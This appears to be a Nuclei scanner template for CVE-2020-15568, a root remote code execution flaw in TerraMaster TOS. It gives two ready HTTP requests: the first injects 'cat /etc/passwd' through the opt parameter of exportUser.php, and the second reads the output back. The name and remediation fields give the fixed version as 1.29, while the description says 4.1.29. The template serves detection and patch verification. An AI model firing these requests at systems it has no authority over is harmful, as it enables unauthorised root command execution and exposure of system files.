id: CVE-2020-15568 info: name: TerraMaster TOS <.1.29 - Remote Code Execution author: pikpikcu severity: critical description: TerraMaster TOS before 4.1.29 has invalid parameter checking that leads to code injection as root. This is a dynamic class method invocation vulnerability in include/exportUser.php, in which an attacker can trigger a call to the exec method with (for example) OS commands in the opt parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade TerraMaster TOS to version 1.29 or higher to mitigate this vulnerability. reference: - https://ssd-disclosure.com/ssd-advisory-terramaster-os-exportuser-php-remote-code-execution/ - https://nvd.nist.gov/vuln/detail/CVE-2020-15568 - https://help.terra-master.com/TOS/view/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-15568 cwe-id: CWE-913 epss-score: 0.96425 epss-percentile: 0.99455 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: terra-master product: tos tags: cve,cve2020,terramaster,rce,terra-master variables: filename: "{{to_lower(rand_text_alpha(4))}}" http: - raw: - | GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3E{{filename}}.txt HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - | GET /include/{{filename}}.txt HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a0047304502204e69e8c61bb15bdc294ce3b5977b69efc66cb6804c0d266d4fddb61ffed3c4d5022100ee9a1ee6be94c6de1853a6e910ea5d0a3d5c6ab0678d62e411266d6b4752a2e4:922c64590222798bb761d5b6d8e72950